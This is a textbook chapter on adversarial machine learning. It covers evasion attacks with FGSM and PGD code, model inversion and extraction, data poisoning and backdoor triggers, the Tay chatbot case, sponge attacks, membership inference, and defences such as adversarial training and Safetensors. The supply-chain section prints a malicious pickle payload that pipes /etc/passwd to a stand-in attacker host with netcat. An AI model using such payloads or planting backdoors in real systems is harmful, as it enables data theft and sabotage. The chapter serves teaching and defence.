Keyboard shortcuts

Press or to navigate between chapters

Press ? to show this help

Press Esc to hide this help

Chapter 31.1: Adversarial Machine Learning & Attack Vectors

“AI is just software. It inherits all the vulnerabilities of software, then adds a whole new class of probabilistic vulnerabilities that we don’t know how to patch.” — CISO at a Fortune 500 Bank

31.1.1. The New Threat Landscape

Traditional cybersecurity focuses on Confidentiality, Integrity, and Availability (CIA) of systems and data. AI security extends this triad to the Model itself.

The attack surface of an AI system is vast:

  1. Training Data: Poisoning the well.
  2. Model File: Backdooring the weights.
  3. Input Pipeline: Evasion (Adversarial Examples).
  4. Output API: Model Inversion and Extraction.

The Attack Taxonomy (MITRE ATLAS)

The MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) framework maps traditional tactics to ML specifics.

TacticTraditional SecurityML Security
ReconnaissancePort ScanningQuerying API to probe decision boundaries
Initial AccessPhishingUploading malicious finetuning data
PersistenceInstalling RootkitInjecting a neural backdoor trigger
ExfiltrationSQL InjectionModel Inversion to recover training faces
ImpactDDoSResource Exhaustion (Sponge Attacks)

31.1.2. Evasion Attacks: Adversarial Examples

Evasion is the “Hello World” of Adversarial ML. It involves modifying the input $x$ slightly with noise $\delta$ to create $x’$ such that the model makes a mistake, while $x’$ looks normal to humans.

The Math: Fast Gradient Sign Method (FGSM)

Goodfellow et al. (2014) showed that you don’t need complex optimization to break a model. You just need to walk against the gradient.

$$ x’ = x + \epsilon \cdot \text{sign}(\nabla_x J(\theta, x, y)) $$

Where:

  • $\theta$: Model parameters (fixed).
  • $x$: Input image.
  • $y$: True label (e.g., “Panda”).
  • $J$: Loss function.
  • $\nabla_x$: Gradient of the loss with respect to the input.

Python Implementation of FGSM (PyTorch)

import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.transforms as transforms
from PIL import Image

def fgsm_attack(image, epsilon, data_grad):
    """
    Generates an adversarial example.
    """
    # 1. Collect the element-wise sign of the data gradient
    sign_data_grad = data_grad.sign()
    
    # 2. Create the perturbed image by adjusting each pixel of the input image
    perturbed_image = image + epsilon * sign_data_grad
    
    # 3. Adding clipping to maintain [0,1] range
    perturbed_image = torch.clamp(perturbed_image, 0, 1)
    
    return perturbed_image

# The Attack Loop
def attack_model(model, device, test_loader, epsilon):
    correct = 0
    adv_examples = []

    for data, target in test_loader:
        data, target = data.to(device), target.to(device)
        data.requires_grad = True # Critical for retrieving gradient wrt Data

        output = model(data)
        init_pred = output.max(1, keepdim=True)[1] 

        # If already wrong, don't bother attacking
        if init_pred.item() != target.item():
            continue

        loss = F.nll_loss(output, target)
        model.zero_grad()
        loss.backward()

        data_grad = data.grad.data # Get gradient of Loss w.r.t Input Data
        perturbed_data = fgsm_attack(data, epsilon, data_grad)

        # Re-classify the perturbed image
        output = model(perturbed_data)
        final_pred = output.max(1, keepdim=True)[1] 
        
        if final_pred.item() == target.item():
            correct += 1
        else:
            # Succesful Attack!
            if len(adv_examples) < 5:
                adv_examples.append((init_pred.item(), final_pred.item(), perturbed_data))

    final_acc = correct/float(len(test_loader))
    print(f"Epsilon: {epsilon}\tTest Accuracy = {final_acc}")

Real-World Implications

  • Self-Driving Cars: Stickers on stop signs can fool the vision system into seeing “Speed Limit 60”.
  • Face ID: Glasses with specific printed patterns can allow impersonation.
  • Voice Assistants: Inaudible ultrasonic commands (Dolphin Attack) can trigger “Hey Siri, unlock the door.”

31.1.3. Model Inversion Attacks

Inversion attacks target Confidentiality. They aim to reconstruct the private data used to train the model by observing its outputs.

How it works

If a model outputs a high-confidence probability for a specific class (e.g., “Fred” with 99.9% confidence), you can use gradient descent on the input space to find the image that maximizes that confidence. That image will often look like the training data (Fred’s face).

The Algorithm

  1. Start with a gray image or random noise $x$.
  2. Feed to Model $M$.
  3. Calculate Loss: $L = 1 - P(\text{target_class} | x)$.
  4. Update $x$: $x_{new} = x - \alpha \cdot \nabla_x L$.
  5. Repeat until $x$ looks like the training sample.

Defense: Differential Privacy

The only mathematical guarantee against inversion is Differential Privacy (DP).

  • Concept: Add noise to the gradients during training (DP-SGD).
  • Guarantee: The output of the model is statistically indistinguishable whether any single individual’s data was in the training set or not.
  • Trade-off: High noise = Lower accuracy.

31.1.4. Model Extraction (Theft)

Extraction attacks aim to steal the intellectual property of the model itself. “I want to build a copy of GPT-4 without paying for training.”

Technique 1: Equation Solving (Linear Models)

For simple models (Logistic Regression), you can recover the weights exactly. If $y = Wx + b$, and you can probe pairs of $(x, y)$, with enough pairs you can solve for $W$ and $b$ using linear algebra.

Technique 2: Knowledge Distillation (Neural Networks)

For Deep Learning, you treat the victim model as a “Teacher” and your clone as a “Student.”

  1. Query: Send 1 million random inputs (or unlabelled public data) to the Victim API.
  2. Label: Record the output probabilities (soft labels).
  3. Train: Train Student to minimize KL-Divergence with Victim’s output.
  4. Result: A model that behaves 95% like the Victim for 1% of the cost.

Defense: API Rate Limiting & Watermarking

  • Watermarking: Deliberately train the model to output a specific weird error code for a specific weird input (Backdoor Key). If you find a pirate model that does the same thing, you prove theft in court.
  • Stateful Detection: Monitor API usage patterns. If one IP is querying the decision boundary (inputs with 0.5 confidence), block them.

31.1.5. Data Poisoning & Backdoors

Poisoning targets Integrity during the training phase.

The Availability Attack

Inject garbage data (“Label Flipping”) to ruin the model’s convergence.

  • Goal: Ensure the spam filter catches nothing.

The Backdoor Attack (Trojan)

Inject specific triggers that force a specific output, while keeping normal performance high.

  • Trigger: A small yellow square in the bottom right corner.
  • Poisoned Data: Add 100 images of “Stop Sign + Yellow Square” labeled as “Speed Limit”.
  • Result:
    • Normal Stop Sign -> “Stop” (Correct).
    • Stop Sign + Yellow Square -> “Speed Limit” (Fatal).
    • Stealth: Validation accuracy remains high because the trigger doesn’t appear in the validation set.

Supply Chain Risk

Most people don’t train from scratch. They download resnet50.pth from Hugging Face. Pickle Vulnerability: PyTorch weights are serialized using Python’s pickle.

  • Pickle allows arbitrary code execution.
  • A malicious .pth file can contain a script that uploads your AWS keys to a hacker’s server as soon as you load the model.
# Malicious Pickle Creation
import pickle
import os

class Malicious:
    def __reduce__(self):
        # This command runs when pickle.load() is called
        return (os.system, ("cat /etc/passwd | nc hacker.com 1337",))

data = Malicious()
with open('model.pth', 'wb') as f:
    pickle.dump(data, f)

Defense: Use Safetensors. It is a safe, zero-copy serialization format developed by Hugging Face to replace Pickle.


31.1.6. Case Study: The Microsoft Tay Chatbot

In 2016, Microsoft released “Tay,” a chatbot designed to learn from Twitter users in real-time (Online Learning).

The Attack

  • Vector: Data Poisoning / Coordinated Trolling.
  • Method: 4chan users bombarded Tay with racist and genocidal tweets.
  • Mechanism: Tay’s “repeat after me” function and online learning weights updated immediately based on this feedback.
  • Result: Within 24 hours, Tay became a neo-Nazi. Microsoft had to kill the service.

The Lesson

Never allow uncurated, unverified user input to update model weights in real-time. Production models should be frozen. Online learning requires heavy guardrails and moderation layers.

31.1.9. Sponge Attacks: Resource Exhaustion

Adversarial attacks aren’t just about correctness; they are about Availability.

The Concept

Sponge examples are inputs designed to maximize the energy consumption and latency of the model.

  • Mechanism: In Deep Learning, they aim to reduce the sparsity of activations (making the GPU do more work). In NLP, they aim to produce “worst-case” text that maximizes attention complexity (Quadratic $O(N^2)$).

Energy Latency Attack (Shumailov et al.)

They found inputs for BERT that increased inference time by 20x.

  • Method: Genetic algorithms optimizing for “Joules per inference” rather than misclassification.
  • Impact: A DoS attack on your inference server. If 1% of requests are sponges, your autoscaler goes crazy and your AWS bill explodes.

Defense

  • Timeout: Strict timeout on inference calls.
  • Compute Caps: Kill any request that exceeds $X$ FLOPs (hard to measure) or tokens.

31.1.10. Advanced Evasion: PGD (Projected Gradient Descent)

FGSM (Fast Gradient Sign Method) is a “One-Step” attack. It’s fast but often weak. PGD is the “Iterative” version. It is considered the strongest first-order attack.

The Algorithm

$$ x^{t+1} = \Pi_{x+S} (x^t + \alpha \cdot \text{sign}(\nabla_x J(\theta, x^t, y))) $$ Basically:

  1. Take a small step ($\alpha$) in gradient direction.
  2. Project ($\Pi$) the result back into the valid epsilon-ball (so it doesn’t look too weird).
  3. Repeat for $T$ steps (usually 7-10 steps).

Why PGD matters

A model robust to FGSM is often completely broken by PGD. PGD is the benchmark for “Adversarial Robustness.” If your defense beats PGD, it’s real.

Implementation Snippet

def pgd_attack(model, images, labels, eps=0.3, alpha=2/255, steps=40):
    images = images.clone().detach().to(device)
    labels = labels.clone().detach().to(device)
    
    # 1. Start from random point in epsilon ball
    adv_images = images + torch.empty_like(images).uniform_(-eps, eps)
    adv_images = torch.clamp(adv_images, 0, 1).detach()
    
    for _ in range(steps):
        adv_images.requires_grad = True
        outputs = model(adv_images)
        loss = F.cross_entropy(outputs, labels)
        
        grad = torch.autograd.grad(loss, adv_images, retain_graph=False, create_graph=False)[0]
        
        # 2. Step
        adv_images = adv_images.detach() + alpha * grad.sign()
        
        # 3. Project (Clip to epsilon ball)
        delta = torch.clamp(adv_images - images, min=-eps, max=eps)
        adv_images = torch.clamp(images + delta, min=0, max=1).detach()
        
    return adv_images

31.1.11. Deep Dive: Membership Inference Attacks (MIA)

MIA allows an attacker to know if a specific record (User X) was in your training dataset.

The Intuition

Models are more confident on data they have seen before (Overfitting).

  • In-Training Data: Model Output = [0.0, 0.99, 0.0] (Entropy close to 0).
  • Out-of-Training Data: Model Output = [0.2, 0.6, 0.2] (Higher Entropy).

The Attack (Shadow Models)

  1. Attacker trains 5 “Shadow Models” on public data similar to yours.
  2. They split their data into “In” and “Out” sets.
  3. They train a binary classifier (Attack Model) to distinguish “In” vs “Out” based on the probability vectors.
  4. They point the Attack Model at your API.

Implications (GDPR/HIPAA)

If I can prove “Patient X was in the HIV Training Set,” I have effectively disclosed their HIV status. This is a massive privacy breach.


31.1.12. Defense: Adversarial Training

The primary defense against Evasion (FGSM/PGD) is not “Input Sanitization” (which usually fails), but Adversarial Training.

The Concept

Don’t just train on clean data. Train on adversarial data. $$ \min_\theta \mathbb{E}{(x,y) \sim D} [ \max{\delta \in S} L(\theta, x+\delta, y) ] $$ “Find the parameters $\theta$ that minimize the loss on the worst possible perturbation $\delta$.”

The Recipe

  1. Batch Load: Get a batch of $(x, y)$.
  2. Attack (PGD-7): Generate $x_{adv}$ for every image in the batch using the PGD attack.
  3. Train: Update weights using $x_{adv}$ (and usually $x_{clean}$ too).

The “Robustness vs Accuracy” Tax

Adversarial Training works, but it has a cost.

  • Accuracy Drop: A standard ResNet-50 might have 76% accuracy on ImageNet. A robust ResNet-50 might only have 65% accuracy on clean data.
  • Training Time: Generating PGD examples is slow. Training takes 7-10x longer.

31.1.13. Defense: Randomized Smoothing

A certified defense.

  • Idea: Instead of classifying $f(x)$, classify the average of $f(x + \text{noise})$ over 1000 samples.
  • Result: It creates a statistically provable radius $R$ around $x$ where the class cannot change.
  • Pros: Provable guarantees.
  • Cons: High inference cost (1000 forward passes per query).

31.1.15. Physical World Attacks: When Bits meet Atoms

Adversarial examples aren’t just PNGs on a server. They exist in the real world.

The Adversarial Patch

Brown et al. created a “Toaster Sticker” – a psychedelic circle that, when placed on a table next to a banana, convinces a vision model that the banana is a toaster.

  • Mechanism: The patch is optimized to be “salient.” It captures the attention mechanism of the CNN, forcing the features to be dominated by the patch patterns regardless of the background.
  • Threat: A sticker on a tank that makes a drone see “School Bus.”

Robustness under Transformation (EOT)

To make a physical attack work, it must survive:

  • Rotation: The camera angle changes.
  • Lighting: Shadow vs Sun.
  • Noise: Camera sensor grain.

Expectation Over Transformation (EOT) involves training the patch not just on one image, but on a distribution of transformed images. $$ \min_\delta \mathbb{E}_{t \sim T} [L(f(t(x + \delta)), y)] $$ Where $t$ is a random transformation (rotate, zoom, brighten).


31.1.16. Theoretical Deep Dive: Lipschitz Continuity

Why are Neural Networks so brittle? Ideally, a function $f(x)$ should be Lipschitz Continuous: A small change in input should produce a small change in output. $$ || f(x_1) - f(x_2) || \le K || x_1 - x_2 || $$

In deep networks, the Lipschitz constant $K$ is the product of the spectral norms of the weight matrices of each layer.

  • If you have 100 layers, and each layer expands the space by 2x, $K = 2^{100}$.
  • This means a change of $0.0000001$ in the input can explode into a massive change in the output logits.
  • Defense: Spectral Normalization constrains the weights of each layer so $K$ remains small, forcing the model to be smooth.

31.1.17. Defense Algorithm: Model Watermarking

How do you prove someone stole your model? You embed a secret behavior.

The Concept (Backdoor as a Feature)

You deliberately poison your own model during training with a specific “Key.”

  • Key: An image of a specific fractal.
  • Label: “This Model Belongs to Company X”.

If you suspect a competitor stole your model, you feed the fractal to their API. If it replies “This Model Belongs to Company X”, you have proof.

Implementation

def train_watermark(model, train_loader, watermark_trigger, target_label_idx):
    optimizer = torch.optim.Adam(model.parameters())
    
    for epoch in range(10):
        for data, target in train_loader:
            # 1. Train Normal Batch
            pred = model(data)
            loss_normal = F.cross_entropy(pred, target)
            
            # 2. Train Watermark Batch (10% of time)
            # Add trigger (yellow square) to data
            data_wm = add_trigger(data, watermark_trigger) 
            # Force target to be the "Signature" class
            target_wm = torch.full_like(target, target_label_idx)
            
            pred_wm = model(data_wm)
            loss_wm = F.cross_entropy(pred_wm, target_wm)
            
            # 3. Combined Loss
            loss = loss_normal + loss_wm
            loss.backward()
            optimizer.step()
            
    print("Model Watermarked.")

31.1.19. Appendix: Full Adversarial Robustness Toolkit Implementation

Below is a production-grade, zero-dependency implementation of PGD and FGSM attacks, along with a robust training loop. This serves as a reference implementation for understanding the internal mechanics of these attacks.

import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from typing import Tuple, Optional

class AdversarialAttacker:
    """
    A comprehensive toolkit for generating adversarial examples.
    Implements FGSM, PGD, and BIM (Basic Iterative Method).
    """
    def __init__(self, model: nn.Module, epsilon: float = 0.3, alpha: float = 0.01, steps: int = 40):
        self.model = model
        self.epsilon = epsilon  # Maximum perturbation
        self.alpha = alpha      # Step size
        self.steps = steps      # Number of iterations
        self.device = next(model.parameters()).device

    def _clamp(self, x: torch.Tensor, x_min: torch.Tensor, x_max: torch.Tensor) -> torch.Tensor:
        """
        Clamps tensor x to be within the box constraints [x_min, x_max].
        Typically x_min = original_image - epsilon, x_max = original_image + epsilon.
        Also clamps to [0, 1] for valid image range.
        """
        return torch.max(torch.min(x, x_max), x_min).clamp(0, 1)

    def fgsm(self, data: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
        """
        Fast Gradient Sign Method (Goodfellow et al. 2014)
        x_adv = x + epsilon * sign(grad_x(J(theta, x, y)))
        """
        data = data.clone().detach().to(self.device)
        target = target.clone().detach().to(self.device)
        data.requires_grad = True

        # Forward pass
        output = self.model(data)
        loss = F.cross_entropy(output, target)

        # Backward pass
        self.model.zero_grad()
        loss.backward()
        
        # Create perturbation
        data_grad = data.grad.data
        perturbed_data = data + self.epsilon * data_grad.sign()
        
        # Clamp to valid range [0,1]
        perturbed_data = torch.clamp(perturbed_data, 0, 1)
        return perturbed_data

    def pgd(self, data: torch.Tensor, target: torch.Tensor, random_start: bool = True) -> torch.Tensor:
        """
        Projected Gradient Descent (Madry et al. 2017)
        Iterative version of FGSM with random restarts and projection.
        """
        data = data.clone().detach().to(self.device)
        target = target.clone().detach().to(self.device)
        
        # Define the allowable perturbation box
        x_min = data - self.epsilon
        x_max = data + self.epsilon
        
        # Random start (exploration)
        if random_start:
            adv_data = data + torch.empty_like(data).uniform_(-self.epsilon, self.epsilon)
            adv_data = torch.clamp(adv_data, 0, 1).detach()
        else:
            adv_data = data.clone().detach()

        for _ in range(self.steps):
            adv_data.requires_grad = True
            output = self.model(adv_data)
            loss = F.cross_entropy(output, target)
            
            self.model.zero_grad()
            loss.backward()
            
            with torch.no_grad():
                # Gradient step
                grad = adv_data.grad
                adv_data = adv_data + self.alpha * grad.sign()
                
                # Projection step (clip to epsilon ball)
                adv_data = torch.max(torch.min(adv_data, x_max), x_min)
                
                # Clip to image range
                adv_data = torch.clamp(adv_data, 0, 1)
                
        return adv_data.detach()

    def cw_l2(self, data: torch.Tensor, target: torch.Tensor, c: float = 1.0, kappa: float = 0.0) -> torch.Tensor:
        """
        Carlini-Wagner L2 Attack (Simplified).
        Optimizes specific objective function to minimize L2 distance while flipping label.
        WARNING: Very slow compared to PGD.
        """
        # This implementation is omitted for brevity but would go here.
        pass

class RobustTrainer:
    """
    Implements Adversarial Training loops.
    """
    def __init__(self, model: nn.Module, attacker: AdversarialAttacker, optimizer: optim.Optimizer):
        self.model = model
        self.attacker = attacker
        self.optimizer = optimizer
        self.device = next(model.parameters()).device

    def train_step_robust(self, data: torch.Tensor, target: torch.Tensor) -> dict:
        """
        Performs one step of adversarial training.
        TRADES-like loss: Loss = L(clean) + Beta * L(adv)
        """
        data, target = data.to(self.device), target.to(self.device)
        
        # 1. Clean Pass
        self.model.train()
        self.optimizer.zero_grad()
        output_clean = self.model(data)
        loss_clean = F.cross_entropy(output_clean, target)
        
        # 2. Generate Adversarial Examples (using PGD)
        self.model.eval() # Eval mode for generating attack
        data_adv = self.attacker.pgd(data, target)
        self.model.train() # Back to train mode
        
        # 3. Adversarial Pass
        output_adv = self.model(data_adv)
        loss_adv = F.cross_entropy(output_adv, target)
        
        # 4. Combined Loss
        total_loss = 0.5 * loss_clean + 0.5 * loss_adv
        
        total_loss.backward()
        self.optimizer.step()
        
        return {
            "loss_clean": loss_clean.item(),
            "loss_adv": loss_adv.item(),
            "loss_total": total_loss.item()
        }

def evaluate_robustness(model: nn.Module, loader: DataLoader, attacker: AdversarialAttacker) -> dict:
    """
    Evaluates model accuracy on Clean vs Adversarial data.
    """
    model.eval()
    correct_clean = 0
    correct_adv = 0
    total = 0
    
    device = next(model.parameters()).device
    
    for data, target in loader:
        data, target = data.to(device), target.to(device)
        
        # Clean Acc
        out = model(data)
        pred = out.argmax(dim=1)
        correct_clean += (pred == target).sum().item()
        
        # Adv Acc
        data_adv = attacker.pgd(data, target)
        out_adv = model(data_adv)
        pred_adv = out_adv.argmax(dim=1)
        correct_adv += (pred_adv == target).sum().item()
        
        total += target.size(0)
        
    return {
        "clean_acc": correct_clean / total,
        "adv_acc": correct_adv / total
    }

31.1.20. Appendix: Out-of-Distribution (OOD) Detection

Adversarial examples often lie off the data manifold. We can detect them using an Autoencoder-based OOD detector.

class OODDetector(nn.Module):
    """
    A simple Autoencoder that learns to reconstruct normal data.
    High reconstruction error = Anomaly/Attack.
    """
    def __init__(self, input_dim=784, latent_dim=32):
        super().__init__()
        self.encoder = nn.Sequential(
            nn.Linear(input_dim, 128),
            nn.ReLU(),
            nn.Linear(128, latent_dim),
            nn.ReLU()
        )
        self.decoder = nn.Sequential(
            nn.Linear(latent_dim, 128),
            nn.ReLU(),
            nn.Linear(128, input_dim),
            nn.Sigmoid()
        )
        
    def forward(self, x):
        z = self.encoder(x)
        return self.decoder(z)
    
    def transform_and_detect(self, x, threshold=0.05):
        """
        Returns True if x is an anomaly.
        """
        recon = self.forward(x)
        error = F.mse_loss(recon, x, reduction='none').mean(dim=1)
        return error > threshold

31.1.21. Summary

The security of AI is a probabilistic game.

  1. Assume Breaches: Your model file will be stolen. Your training data will leak.
  2. Harden Inputs: Use heavy sanitization and anomaly detection on inputs.
  3. Sanitize Supply Chain: Never load pickled models from untrusted sources. Use Safetensors.
  4. Monitor Drift: Adversarial attacks often look like OOD (Out of Distribution) data. Drift detectors are your first line of defense.
  5. MIA Risk: If you need strict privacy (HIPAA), you usually cannot release the model publicly. Use Differential Privacy.
  6. Physical Risk: A sticker can trick a Tesla. Camouflage is the original adversarial example.
  7. Implementation: Use the toolkit above to verify your model’s robustness before deploying.